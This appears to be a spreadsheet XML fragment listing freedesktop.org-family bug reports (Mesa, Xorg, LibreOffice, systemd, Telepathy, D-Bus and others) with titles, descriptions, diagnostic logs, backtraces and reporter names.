  <si>
    <t>MESA-105377</t>
  </si>
  <si>
    <t>Native dependency 'libtizonia' not found</t>
  </si>
  <si>
    <t>$ meson builddir
[...]
Meson encountered an error in file meson.build line 494 column 2:
Native dependency 'libtizonia' not found</t>
  </si>
  <si>
    <t>LIBREOFFICE-36499</t>
  </si>
  <si>
    <t>Helppack (localized help) confusion</t>
  </si>
  <si>
    <t>[LibO 3.4 Beta 2 on WinXP)
Install helppacks en-US fr de.
Select language of user interface
1. French (France)
Try also in a second step
2. German (Germany)
Open Help (F1)
Help shows in the left area French or German text
and in the right area English text.
See the attached screenshots.
Maybe related to Bug 36451 - Localisation breakage in 3.4 beta2
(or duplicate?)</t>
  </si>
  <si>
    <t>courrier.oou.fr.mjk</t>
  </si>
  <si>
    <t>XORG-15605</t>
  </si>
  <si>
    <t>[845G] resolution detect error (8086:2562)</t>
  </si>
  <si>
    <t>Created attachment 16038
xorg.conf
Hello
my monitor should support 1024x768 but currently I only can work under 800x600.
my system information:
$ uname -a
Linux lidb-desktop2 2.6.24-1-686 #1 SMP Thu Mar 27 17:45:04 UTC 2008 i686 GNU/Linux
$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description:    Debian GNU/Linux unstable (sid)
Release:        unstable
Codename:       sid
$ dpkg -l xserver-xorg-core | grep ^ii
ii  xserver-xorg-core 1.4.1~git20080131-3 Xorg X server - core server
$ dpkg -l xserver-xorg-video-intel | grep ^ii
ii  xserver-xorg-video-intel 2.2.99.903-1   X.Org X server -- Intel i8xx i9xx display driver
$ lspci -nn
00:00.0 Host bridge [0600]: Intel Corporation 82845G/GL[Brookdale-G]/GE/PE DRAM Controller/Host-Hub Interface [8086:2560] (rev 03)
00:02.0 VGA compatible controller [0300]: Intel Corporation 82845G/GL[Brookdale-G]/GE Chipset Integrated Graphics Device [8086:2562] (rev 03)
00:1d.0 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #1 [8086:24c2] (rev 02)
00:1d.1 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #2 [8086:24c4] (rev 02)
00:1d.2 USB Controller [0c03]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) USB UHCI Controller #3 [8086:24c7] (rev 02)
00:1d.7 USB Controller [0c03]: Intel Corporation 82801DB/DBM (ICH4/ICH4-M) USB2 EHCI Controller [8086:24cd] (rev 02)
00:1e.0 PCI bridge [0604]: Intel Corporation 82801 PCI Bridge [8086:244e] (rev 82)
00:1f.0 ISA bridge [0601]: Intel Corporation 82801DB/DBL (ICH4/ICH4-L) LPC Interface Bridge [8086:24c0] (rev 02)
00:1f.1 IDE interface [0101]: Intel Corporation 82801DB (ICH4) IDE Controller [8086:24cb] (rev 02)
00:1f.3 SMBus [0c05]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) SMBus Controller [8086:24c3] (rev 02)
00:1f.5 Multimedia audio controller [0401]: Intel Corporation 82801DB/DBL/DBM (ICH4/ICH4-L/ICH4-M) AC'97 Audio Controller [8086:24c5] (rev 02)
01:01.0 Ethernet controller [0200]: Realtek Semiconductor Co. Ltd. RTL-8139/8139C/8139C+ [10ec:8139] (rev 10)
xorg.conf and Xorg.0.log in attchment.</t>
  </si>
  <si>
    <t>lidaobing</t>
  </si>
  <si>
    <t>MESA-84156</t>
  </si>
  <si>
    <t>Half of lighting gets broken in older apps</t>
  </si>
  <si>
    <t>This is from old bug 77785 and about old games where seems like GLSL is not used. In examples i can mention it happens when truck/vehicle turn on lights. Useful apitrace from 18 WoS: Pedal to the Metal game - it is OpenGL game running under wine:
 https://dl.dropboxusercontent.com/u/74553632/pttm_trace2.7z
 The same issue i found that can be reproduced is with 3DMark2001 http://www.futuremark.com/benchmarks/legacy (which is mostly for benchmarking DirectX8 features. So it happens too in 'Car Chase' test but only when wine is used with UseGLSL disabled.
 http://wiki.winehq.org/UsefulRegistryKeys</t>
  </si>
  <si>
    <t>RARIAN-11957</t>
  </si>
  <si>
    <t>yelp crashed with SIGSEGV in strlen()</t>
  </si>
  <si>
    <t xml:space="preserve">The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/yelp/+bug/130822
Binary package hint: yelp
yelp 2.19.1-0ubuntu1 crashed on startup when going to System-&gt;Help and Support
...
GNU gdb 6.6-debian
Copyright (C) 2006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x86_64-linux-gnu...
Using host libthread_db library /lib/libthread_db.so.1.
(gdb)  handle SIG33 pass nostop noprint
Signal        Stop	Print	Pass to program	Description
SIG33         No	No	Yes		Real-time event 33
(gdb) set pagination 0
(gdb) run
Starting program: /usr/bin/yelp 
[Thread debugging using libthread_db enabled]
[New Thread 47365817343952 (LWP 1820)]
[New Thread 1082132816 (LWP 1823)]
[New Thread 1090525520 (LWP 1826)]
[New Thread 1098918224 (LWP 1827)]
[New Thread 1107310928 (LWP 1828)]
[New Thread 1115703632 (LWP 1829)]
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread 1115703632 (LWP 1829)]
0x00002b142ec78a80 in strlen () from /lib/libc.so.6
(gdb) backtrace full
#0  0x00002b142ec78a80 in strlen () from /lib/libc.so.6
No symbol table info available.
#1  0x00002b142ec471aa in vfprintf () from /lib/libc.so.6
No symbol table info available.
#2  0x00002b142ec636b9 in vsprintf () from /lib/libc.so.6
No symbol table info available.
#3  0x00002b142ec4d398 in sprintf () from /lib/libc.so.6
No symbol table info available.
#4  0x00002b142d768222 in process_check_file () at rarian-info.c:338
	filename = 0xfefefefefefefeff 
	iter = 
	fileinfo = {st_dev = 0 st_ino = 47365687175552 st_nlink = 38 st_mode = 787835264 st_uid = 11028 st_gid = 16311792 pad0 = 0 st_rdev = 16311840 st_size = 47365664240024 st_blksize = 1 st_blocks = 17334672 st_atim = {tv_sec = 47365684077094 tv_nsec = 0} st_mtim = {tv_sec = 4311690896 tv_nsec = 17334672} st_ctim = {tv_sec = 16723600 tv_nsec = 17334672} __unused = {0 47365664240024 1}}
#5  0x00002b142d768395 in process_info_dir (dir=) at rarian-info.c:436
	filename = 
	fp = (FILE *) 0xff2e90
	line = 
	started = 1
#6  0x00002b142d7684da in rrn_info_init () at rarian-info.c:534
	dirname = 0xfbe930 /usr/share/info
	info_dirs = 0xdc0490 /usr/info:/usr/share/info:/usr/local/info:/usr/local/share/info
	split = 0xdc049a /usr/share/info:/usr/local/info:/usr/local/share/info
	free_info_dirs = 1
#7  0x00002b142d7686f5 in rrn_info_get_categories () at rarian-info.c:556
No locals.
#8  0x000000000041f0ba in toc_process_info (toc=0x8ce810) at yelp-toc.c:699
	node = (xmlNodePtr) 0x1055800
	cat_node = 
	mynode = 
	categories = 
	sectno = 
	priv = (YelpTocPriv *) 0x8ce8b0
	i = 1
	xpath = (xmlXPathContextPtr) 0xf92db0
	obj = (xmlXPathObjectPtr) 0xf96000
	info_doc = (xmlDocPtr) 0xf2a030
	parserCtxt = (xmlParserCtxtPtr) 0xfd2ab0
#9  0x00002b142d4e2b84 in ?? () from /usr/lib/libglib-2.0.so.0
No symbol table info available.
#10 0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
No symbol table info available.
#11 0x00002b142ecd3bed in clone () from /lib/libc.so.6
No symbol table info available.
#12 0x0000000000000000 in ?? ()
No symbol table info available.
(gdb) info registers
rax            0xfefefefefefefeff	-72340172838076673
rbx            0x42803e90	1115700880
rcx            0x1	1
rdx            0x42803ed0	1115700944
rsi            0x2b142d770f0e	47365662117646
rdi            0xfefefefefefefeff	-72340172838076673
rbp            0x42803d60	0x42803d60
rsp            0x42803698	0x42803698
r8             0xfefefefefefefeff	-72340172838076673
r9             0x2f2f2f2f2f2f2f2f	3399988123389603631
r10            0x65657263732d6c6c	7306371741938183276
r11            0x246	582
r12            0x2b142d770f0d	47365662117645
r13            0xfefefefefefefeff	-72340172838076673
r14            0x4	4
r15            0x0	0
rip            0x2b142ec78a80	0x2b142ec78a80 
eflags         0x10213	[ CF AF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x63	99
gs             0x0	0
fctrl          0x37f	895
fstat          0x0	0
ftag           0xffff	65535
fiseg          0x2aaa	10922
fioff          0xaefbc324	-1359232220
foseg          0x0	0
fooff          0xdcfcf0	14482672
fop            0x558	1368
mxcsr          0x1fa1	[ IE PE IM DM ZM OM UM PM ]
(gdb) thread apply all backtrace
Thread 6 (Thread 1115703632 (LWP 1829)):
#0  0x00002b142ec78a80 in strlen () from /lib/libc.so.6
#1  0x00002b142ec471aa in vfprintf () from /lib/libc.so.6
#2  0x00002b142ec636b9 in vsprintf () from /lib/libc.so.6
#3  0x00002b142ec4d398 in sprintf () from /lib/libc.so.6
#4  0x00002b142d768222 in process_check_file () at rarian-info.c:338
#5  0x00002b142d768395 in process_info_dir (dir=) at rarian-info.c:436
#6  0x00002b142d7684da in rrn_info_init () at rarian-info.c:534
#7  0x00002b142d7686f5 in rrn_info_get_categories () at rarian-info.c:556
#8  0x000000000041f0ba in toc_process_info (toc=0x8ce810) at yelp-toc.c:699
#9  0x00002b142d4e2b84 in ?? () from /usr/lib/libglib-2.0.so.0
#10 0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
#11 0x00002b142ecd3bed in clone () from /lib/libc.so.6
#12 0x0000000000000000 in ?? ()
Thread 5 (Thread 1107310928 (LWP 1828)):
#0  0x00002b142e4d7af8 in __lll_mutex_lock_wait () from /lib/libpthread.so.0
#1  0x00002b142e4d3ada in _L_mutex_lock_100 () from /lib/libpthread.so.0
#2  0x00002b142e4d3475 in pthread_mutex_lock () from /lib/libpthread.so.0
#3  0x00002b142d4e2bf2 in ?? () from /usr/lib/libglib-2.0.so.0
#4  0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
#5  0x00002b142ecd3bed in clone () from /lib/libc.so.6
#6  0x0000000000000000 in ?? ()
Thread 4 (Thread 1098918224 (LWP 1827)):
#0  0x00002b142ecbad07 in sched_yield () from /lib/libc.so.6
#1  0x000000000041e997 in toc_process (toc=0x8ce810) at yelp-toc.c:558
#2  0x00002b142d4e2b84 in ?? () from /usr/lib/libglib-2.0.so.0
#3  0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
#4  0x00002b142ecd3bed in clone () from /lib/libc.so.6
#5  0x0000000000000000 in ?? ()
Thread 3 (Thread 1090525520 (LWP 1826)):
#0  0x00002b142e4d5997 in pthread_cond_timedwait@@GLIBC_2.3.2 () from /lib/libpthread.so.0
#1  0x00002b1435313268 in ?? () from /usr/lib/libnspr4.so.0d
#2  0x00002b1435313e8a in PR_WaitCondVar () from /usr/lib/libnspr4.so.0d
#3  0x00002b142efe36a2 in ?? () from /usr/lib/firefox/libxpcom_core.so
#4  0x00002b142efe17dc in ?? () from /usr/lib/firefox/libxpcom_core.so
#5  0x00002b14353194cd in ?? () from /usr/lib/libnspr4.so.0d
#6  0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
#7  0x00002b142ecd3bed in clone () from /lib/libc.so.6
#8  0x0000000000000000 in ?? ()
Thread 2 (Thread 1082132816 (LWP 1823)):
#0  0x00002b142eccacb6 in poll () from /lib/libc.so.6
#1  0x00002b14353157bd in PR_Poll () from /usr/lib/libnspr4.so.0d
#2  0x00002b143880bb76 in ?? () from /usr/lib/firefox/components/libnecko.so
#3  0x00002b143880c2fe in ?? () from /usr/lib/firefox/components/libnecko.so
#4  0x00002b142efe17dc in ?? () from /usr/lib/firefox/libxpcom_core.so
#5  0x00002b14353194cd in ?? () from /usr/lib/libnspr4.so.0d
#6  0x00002b142e4d1317 in start_thread () from /lib/libpthread.so.0
#7  0x00002b142ecd3bed in clone () from /lib/libc.so.6
#8  0x0000000000000000 in ?? ()
Thread 1 (Thread 47365817343952 (LWP 1820)):
#0  0x00002b142eccacb6 in poll () from /lib/libc.so.6
#1  0x00002b142dde9470 in ?? () from /usr/lib/libX11.so.6
#2  0x00002b142dde9899 in _XRead () from /usr/lib/libX11.so.6
#3  0x00002b142ddea2c1 in _XReply () from /usr/lib/libX11.so.6
#4  0x00002b142ddcbfb2 in XGetAtomName () from /usr/lib/libX11.so.6
#5  0x00002b142bfbaa56 in gdk_x11_xatom_to_atom_for_display () from /usr/lib/libgdk-x11-2.0.so.0
#6  0x00002b142bfad2e7 in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#7  0x00002b142bfae8c2 in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#8  0x00002b142bfaedce in ?? () from /usr/lib/libgdk-x11-2.0.so.0
#9  0x00002b142d4c10a3 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#10 0x00002b142d4c43ad in ?? () from /usr/lib/libglib-2.0.so.0
#11 0x00002b142d4c46ba in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#12 0x00002b142baaf9d3 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#13 0x0000000000419630 in main (argc= argv=0x7fff7febb5d8) at yelp-main.c:121
#14 0x00002b142ec1db44 in __libc_start_main () from /lib/libc.so.6
#15 0x000000000040e0b9 in _start ()
#0  0x00002b142ec78a80 in strlen () from /lib/libc.so.6
(gdb) quit
The program is running.  Exit anyway? (y or n) </t>
  </si>
  <si>
    <t>TELEPATHY-50093</t>
  </si>
  <si>
    <t>[next] consider merging Contacts and Requests ifaces into Connection</t>
  </si>
  <si>
    <t>I've heard Simon speaking about that: Contacts and Requests are now mandatory for any useful CM. With all the stuff we removed it won't make a huge iface...
Also about those ifaces:
 - GetContactAttributes should be renamed to GetContact(ByHandle) IMO since it's now the only way to get a contact.
 - ContactAttributeInterfaces can die now that CMs must implement all contact attributes. Connection.Interfaces is enough.
 - Request/InspectHandles can die (bug #50085)</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-3215</t>
  </si>
  <si>
    <t>OCAL: Add a category for openclipart.org bugs</t>
  </si>
  <si>
    <t>The openclipart.org would like to request a category for bugs called
openclipart.org (just like there are other categories for various projects). Our
project is in dire need of a bug tracking system as we previously setup mantis
and think it is better to centralize with bugzilla rather than offer another
setup that we would have to maintain.
Thanks sitewranglers!</t>
  </si>
  <si>
    <t>SYSTEMD-89221</t>
  </si>
  <si>
    <t>fix example 2 in systemd.network man page</t>
  </si>
  <si>
    <t>I have systemd version 219.
Citing example 2 from systemd.network:
[Match]
Name=en*
[Network]
DHCP=both
And above we read:
DHCP=
  Enables DHCPv4 and/or DHCPv6 support. Accepts yes no ipv4 or ipv6.
both is not listed as a possible value anymore please change to yes.</t>
  </si>
  <si>
    <t>ao</t>
  </si>
  <si>
    <t>TELEPATHY-63119</t>
  </si>
  <si>
    <t>tests should be isolated from starter bus</t>
  </si>
  <si>
    <t>Created attachment 77421
with-session-bus.sh: clear DBUS_STARTER_*
telepathy-glib prefers to use DBUS_BUS_STARTER for the benefit of
Telepathy components that are (or might be) service-activatable.
The actual terminal part of gnome-terminal 3.8 is an activatable service
so when run from there we pick up the real session bus' address via
DBUS_STARTER_ADDRESS. We don't want that.
(Yes it's DBUS_STARTER_ADDRESS not DBUS_STARTER_BUS_ADDRESS. The
reference implementation and the D-Bus Specification both say so.)
---
The same change should be applied to every other Telepathy project that copies with-session-bus.sh I'll take a positive review here as positive review for all copies.</t>
  </si>
  <si>
    <t>DEJAVU-15760</t>
  </si>
  <si>
    <t>cannot render cyrillic letter io (U+0401 U+0451)</t>
  </si>
  <si>
    <t>Created attachment 16248
cyriillic small letter io (U+0451) formatted by DejaVu Sans font
Following command:
  gs -dBATCH -dNOPAUSE -sDEVICE=pxlmono -r600x600 -sOutputFile=out.pcl in.ps
fails with message:
  ERROR: /invalidfont in --.type42execchar--
when input file contains either small or capital cyrillic letter io (U+0401 U+0451) and is formatted with fonts:
  DejaVu Sans
  DejaVu Serif
The same command renders successfully when file is formatted with any of the following fonts:
  DejaVu Sans Condensed
  DejaVu Sans Light
  DejaVu Sans Mono
  DejaVu Serif Condensed
Other fonts e.g. ThorndaleAMT are rendered successfully too. Problem input file consisting of single letter io is attached.</t>
  </si>
  <si>
    <t>zhuravlov.ip</t>
  </si>
  <si>
    <t>UDISKS-61971</t>
  </si>
  <si>
    <t>linux-md</t>
  </si>
  <si>
    <t>format takes no argument - fails to build with gcc-4.8</t>
  </si>
  <si>
    <t>Created attachment 76124
Remove spurious argument for the format
Remove spurious argument for the format (which takes
 none).
Fixes gcc 4.8 build:
udisks/src/udiskslinuxmdraid.c:
In function 'handle_start':
udisks/src/udiskslinuxmdraid.c:693:46:
error: too many arguments for format [-Werror=format-extra-args]
                                              raid_device_file)</t>
  </si>
  <si>
    <t>SYSTEMD-28483</t>
  </si>
  <si>
    <t>Seg-Fault when booting up</t>
  </si>
  <si>
    <t>After building systemd with git head:
2f198e2f36a4acc05171cc2169bc58887c42d350
systemd segfaults when I rebooted into it and caused a kernel panic.
Terminal Output----------
...
systemd[1]: Mounting cgroup to /cgroup/blkio of type cgroup with options blkio.
systemd[1]: segfault at 7fff5bd8aeb8 ip 00007fc32f8f93ba sp 00007fff5bd8aec0 err
or 6 in libc-2.12.90.so[7fc32f8b4000+17d000]
kernel panic - not syncing: Attempted to kill init!
Pid: 1 comm: systemd Not tainted 2.6.33.3-85.fc13.x86_64 #1
Call Trace:
[] panic+0x75/0x138
[] ? get_current_tty+0x61/0x69
[] do_exit+0x76/0x71a
[] ? __dequeue_signal+0xe8/0x11d
[] do_group_exit+0x7c/0xa6
[] get_signal_to_deliver+0x3a1/0x3c3
[] do_signal+0x6d/0x6b3
[] ? printk+0x3c/0x41
[] ? bad_area+0x42/0x49
[] do_notify_resume+0x23/0x81
[] retint_signal+0x48/0x8c</t>
  </si>
  <si>
    <t>manojm</t>
  </si>
  <si>
    <t>MESA-29774</t>
  </si>
  <si>
    <t>[softpipe] piglit texgen regression</t>
  </si>
  <si>
    <t>mesa: 8dd619ba6825e673a357336b69c96accaa96a7ef (master)
piglit texgen now fails but previously passed. The test also fails with GALLIUM_NOSSE=1.
$ ./bin/texgen -auto
Probe at (1616)
  Expected: 0.250000 0.250000 0.000000
  Observed: 0.000000 0.000000 0.000000
test_texgen_eye: 00 failed</t>
  </si>
  <si>
    <t>keithw</t>
  </si>
  <si>
    <t>XORG-27114</t>
  </si>
  <si>
    <t>xorg crashes when resuming from suspend to ram</t>
  </si>
  <si>
    <t>When resuming from suspend to RAM x.org sometimes (!) crashes. Enabling core-dumps and using gdb reveals what looks like an endless loop in hw/xfree86/modes/xf86RandR12.c:xf86RandR12EnterVT. Rebuilding the Xserver after commenting out line 1792 of the same file (pScrn-&gt;EnterVT = xf86RandR12EnterVT) helps (it does not requery screens after resume then but at least it does not crash).
Probably worth noting is that I run the i3 window manager in the latest version in which it is RandR-aware and receives screenchange outputchange crtcchange and outputproperty RandR events so maybe it is necessary to select these events to trigger the bug.
X.org version is 1.7.5.902 log contains no messages related to this crash (xorg just segfaults). Driver is intel 2.9.1 hardware a ThinkPad x200 with IntelÂ® GM45 graphics card.
Please let me know if you need any more information.</t>
  </si>
  <si>
    <t>michael+freedesktop</t>
  </si>
  <si>
    <t>XORG-11590</t>
  </si>
  <si>
    <t>git-20070811: xrandr --output VGA --rotate left and back right causes not normal position</t>
  </si>
  <si>
    <t>When I write:
xrandr --output VGA --rotate left
X crashes and kdm popups again :(</t>
  </si>
  <si>
    <t>cijoml</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-90690</t>
  </si>
  <si>
    <t>epoxy project</t>
  </si>
  <si>
    <t>Eric is currently hosting this on github would be nice to have a project on freedesktop for it offically to live out of.
Need git project bugzilla and file upload space at least to make tarball releases I suppose.
Set myself and anholt to be the acks I suppose.</t>
  </si>
  <si>
    <t>TELEPATHY-38852</t>
  </si>
  <si>
    <t>Call: Name methods like methods and signals like signals</t>
  </si>
  <si>
    <t>The StreamedMedia api is embarrassing. Let's not make the same mistake in Call
git grep '&lt;method' spec/*Call* shows the following questionable names:
spec/Call_Content_Interface_Media.xml:    &lt;method name=Error
spec/Call_Stream_Interface_Media.xml:    &lt;method name=CandidatesPrepared
spec/Call_Stream_Interface_Media.xml:    &lt;method name=Error
git grep '&lt;signal' spec/*Call* reveals only:
spec/Call_Stream_Interface_Media.xml:    &lt;signal name=PleaseRestartICE
I plan to change PleaseRestartICE to ICERestartRequested (and have a boolean ICERestartPending for state recovery) as part of #35012 though so no need to worry about that one.
CandidatesPrepared could be called FinishInitialCandidateBatch but that's a horrible name. As someone who has been screwed both by failing to call this method in sip and failing to flush sockets in unix I'm tempted to call it FlushCandidates. Thoughts?
The Error methods could both be called RemoveWithError.</t>
  </si>
  <si>
    <t>WAYLAND-103282</t>
  </si>
  <si>
    <t>XWayland refresh rate locked to 60 Hz</t>
  </si>
  <si>
    <t>Looks like xwayland doesn't report the correct refresh rate/vsync timings(?) to clients. I've been working around compositor implementation flaws by using a custom EDID file. Now the compositors I've tried (Mutter KWin Sway) run at the correct 144 Hz however xwayland clients still only refresh at 60 Hz.
This is bad because if using a monitor with no even multiple of 60 Hz (like 72 75 or 144 Hz monitors) there is stutter instead of smooth playback. And I guess many common apps will be running through xwayland for quite some time.
I can also confirm the problem running glxgears which runs v-synced and prints 60 FPS to the console.</t>
  </si>
  <si>
    <t>grmat</t>
  </si>
  <si>
    <t>XORG-5494</t>
  </si>
  <si>
    <t>Allow querying driver options from command line</t>
  </si>
  <si>
    <t>05:26  is there some way to query arbitrary drivers for what config
                   options they take?
05:27  spyderous: yes technically
05:28  we even do it.  X -configure will dump all the driver options it
              can find for the appropriate video driver
05:28  i don't know how it would make sense but i'd like to be able
                   to say X -driver sisusb -dumpoptions
05:28  not an easy way to get that list outside the server though
05:29  eh i can probably give you that in a 15-minute hack with a
              little work
05:29  mind filing a bug about it to remind me?
05:30  i would love to</t>
  </si>
  <si>
    <t>DRI-30654</t>
  </si>
  <si>
    <t>[855] flickers when vblank_mode is enabled</t>
  </si>
  <si>
    <t>The 3 games I tried (teeworldstremulousneverball) trigger the following error when run at fullscreen 1024x768 (laptop native resolution) :
[drm:intel_prepare_page_flip] *ERROR* Prepared flip multiple times
On tremulous and teeworlds this is associated with a lot of black flashes / flickers.
In window mode or in fullscreen at lower resolution (e.g. 800x600) there is no flicker and no ERROR.
I am using latest git of everything but I believe the flickers have been there for quite some time and are probably reproducible on the latest stable release too.
00:02.0 VGA compatible controller: Intel Corporation 82852/855GM Integrated Graphics Device (rev 02)
mesa 06472ad7e835813ef7c9bf8a5cd8b62a25fa9cc3
ddx 1444ea35706992a1f094fe029e6a7d9eec0f93c6
drm-intel-next 7b4f3990a22fbe800945f12001bc30db374d0af5
X.Org X Server 1.9.0</t>
  </si>
  <si>
    <t>shiningxc</t>
  </si>
  <si>
    <t>LIBXKBCOMMON-67032</t>
  </si>
  <si>
    <t>String difference in repeated keymap compile from string</t>
  </si>
  <si>
    <t>Created attachment 82581
dump
struct xkb_context *ctx = xkb_context_new(0)
    struct xkb_keymap *keymap
    struct xkb_keymap *keymap2
    char *dump *dump2
    keymap = xkb_keymap_new_from_names(ctx 0 0)
    dump = xkb_keymap_get_as_string(keymap XKB_KEYMAP_USE_ORIGINAL_FORMAT)
    keymap2 = xkb_keymap_new_from_string(ctx dump10)
    dump2 = xkb_keymap_get_as_string(keymap2 XKB_KEYMAP_USE_ORIGINAL_FORMAT)
dump and dump2 are now different strings (attached).</t>
  </si>
  <si>
    <t>auke</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-12498</t>
  </si>
  <si>
    <t>Default theme issues</t>
  </si>
  <si>
    <t>I'm attaching a screenshot of how the default theme looks. The design around RecentChanges has some clear issues.
Besides the icons for actions like: Edit View etc. are quite ambiguous. Can the default theme be changed to something more sensible?</t>
  </si>
  <si>
    <t>felipe.contreras</t>
  </si>
  <si>
    <t>MESA-19482</t>
  </si>
  <si>
    <t>[G45] Norsetto glass demo has problems with chromatic aberration</t>
  </si>
  <si>
    <t>When the glass demo is run with chromatic aberration (press p to toggle on/off) the sphere turns green instead of reflecting the environment.
It seems to work fine in software mode.
http://norsetto.890m.com/glass.php
System environment:
-- chipset: G45 / ICH10R
-- system architecture: 32-bit
-- Linux distribution: Debian unstable
-- Machine or mobo model: Asus P5Q-EM
-- Display connector: DVI
-- xf86-video-intel: 91c49067abab262edce54d33af8bfc03eee20f2e
-- xserver: 1.5.3
-- mesa: 4497a5a57d0fdb5c5ec15750e477aeb49f5e453d
-- drm: 0243c9f801a35de3465a0321c02f18a4d07ce5b8
-- kernel: drm-intel-2.6.28 72e2bfb03f46f7eef1ae8907593dd35e2c5603de</t>
  </si>
  <si>
    <t>LIBREOFFICE-76591</t>
  </si>
  <si>
    <t>Textbox property (order-&gt; send behind text) not preserved</t>
  </si>
  <si>
    <t>Created attachment 96357
Original File
Textbox property (order-&gt; send behind text) not preserved
1)Launch LO
2)Generate RT file for original file attached.
Actual:-TextBox property is not preserved.</t>
  </si>
  <si>
    <t>XORG-41838</t>
  </si>
  <si>
    <t>Kernel Crash/Hanging system in connection between WebKit and Gnome-Shell</t>
  </si>
  <si>
    <t>Hello!
I discovered this issue while browseing with WebKit based browser like Midori or Epiphany within the new Gnome-Shell.
Steps to reproduce:
1. Gnome 3.2 with Gnome-Shell using the Radeon-Drivers from Linux/XORG
1. # sysctl -w kernel.sysrq=1 // WARNING! This will not save your ass!!!
2. $ launch Midori or Epiphany with enabled JavaScript
3. http://piratpix.com/bpt2011.1/index.html // Pictures from federal convent of german Pirate-Party note: There is a javascript void(0) error on the site
4. open one or some image with the mouse
Results:
* Crash/Hang of system
* MagicSysRq will not help!
Software/Hardware:
pacman -Q libwebkit libwebkit3 midori epiphany
libwebkit 1.6.1-1
libwebkit3 1.6.1-1
midori 0.4.1-1
epiphany 3.2.0-1
and also:
* Self compiled vanilla kernel 3.0.3 and stock kernel 3.0.6 from Archlinux
* Graphis-Card is an AMD Radeon 5650 with open-source drivers
Not affected:
* Gnome 3.2 in Fallback-Mode
* Firefox 7 (shows also the javascript void(0) but displays everything like usual)
* Fedora 15 with Radeon 4670 and open-source drivers and Midori 0.3.6
Soughts:
* Maybe row of problems start with the JavaScript-Error
* Next Step is WebKit
* Next Steop is Gnome-Shell
* But even if there bugs in all of them above the operating-system should crash/hang in any chase. So I afraid this is a bug in kernel/radeon-driver.
* It is also interesting the the Fedora 15 with an other AMD Graphics-Card is not affected.
Thanks
PS: Discussion in the forums of Archlinux - https://bbs.archlinux.org/viewtopic.php?pid=1004227#p1004227</t>
  </si>
  <si>
    <t>MESA-31868</t>
  </si>
  <si>
    <t>EGL doesn't work with multiple surfaces</t>
  </si>
  <si>
    <t>It seems that if you call eglMakeCurrent to switch between two surfaces then Mesa gets very confused and decides that there is no context any more so nothing paints. Attached is a patch to mesa-demos to modify the 'tri' demo for EGL/GLES2 so that it draws to two windows.
I've bisected the problem as much as I can to a range of commits but within that range instead of just not painting the demo segfaults. I'm guessing this is a separate problem. The bisect then looks like this:
547e7619aac74ae13bdaa7fdf403a4ceb5212467 &lt;--- first known bad commit
d1acb920163ab0f39ff2fc72b85fc7bf16c37262 &lt;--- unknown segfaults
                  .
                  .                       }
                  .                       } all in this range seem to segfault
                  .                       }
                  .
d19afc57fe49816f3f3290410e0124d326577be2 &lt;--- unknown segfaults
dc4f845c37a8446de19036e24fd397a0aa864c02 &lt;--- last known good commit
547e7619 seems like a good candidate to be the culprit because it makes changes in the right area.
The bug breaks Clutter because Clutter relies on being able to switch between surfaces even if there is only one stage. It needs to create an initial invisible dummy window before creating any stage so that it can bind the context to something in order to query the features.</t>
  </si>
  <si>
    <t>DBUS-37258</t>
  </si>
  <si>
    <t>file dicriptor leak in _dbus_connect_tcp_socket_with_nonce</t>
  </si>
  <si>
    <t>In dbus-sysdeps-unix.c _dbus_connect_tcp_socket_with_nonce()
  if (!_dbus_open_tcp_socket (&amp;fd error))
    {
      _DBUS_ASSERT_ERROR_IS_SET(error)
      return -1
    }
the fd is never closed and never used. So every tcp reconnect will leak a file dicriptor.
Thanks</t>
  </si>
  <si>
    <t>tuqiang2009</t>
  </si>
  <si>
    <t>XDGMIME-2939</t>
  </si>
  <si>
    <t>xdgmimecache.c has a couple of brown-paper-bag bugs in it. 
The following patch fixes them.</t>
  </si>
  <si>
    <t>XORG-17215</t>
  </si>
  <si>
    <t>Screen resolution issues with Radeon Mobility 7500 unless NoDDC specified</t>
  </si>
  <si>
    <t>Several Ubuntu users are reporting this issue:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+bug/160871
With an ATI 7500 the lcd screen shows 1400x1050 but xrandr offers no other resolutions although several are supported.
http://launchpadlibrarian.net/12221450/xorg.conf
http://launchpadlibrarian.net/12221452/Xorg.0.log
(II) RADEON(0): Printing DDC gathered Modelines:
(II) RADEON(0): Modeline 1400x1050x0.0 108.00 1400 1448 1560 1688 1050 1051 1054 1068 -hsync -vsync (64.0 kHz)
(II) RADEON(0): DDC Type: 4 Detected Monitor Type: 2
(II) RADEON(0): EDID data from the display on connector: Proprietary/LVDS ----------------------
(II) RADEON(0): Manufacturer: HTC Model: 17b0 Serial#: 420189172
...
(II) RADEON(0): First detailed timing not preferred mode in violation of standard!(II) RADEON(0): redX: 0.590 redY: 0.340 greenX: 0.320 greenY: 0.560
Looks like it's using DDC instead of EDID and DDC is only returning the one resolution.
Adding Option NoDDC to xorg.conf fixes the issue.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-94176</t>
  </si>
  <si>
    <t>wiki is borked</t>
  </si>
  <si>
    <t>The wiki is borked. If I log in I get 
Error: Cannot decode string with wide characters at /usr/lib/x86_64-linux-gnu/perl/5.20/Encode.pm line 215. 
and nothing works from then on.</t>
  </si>
  <si>
    <t>MESA-99789</t>
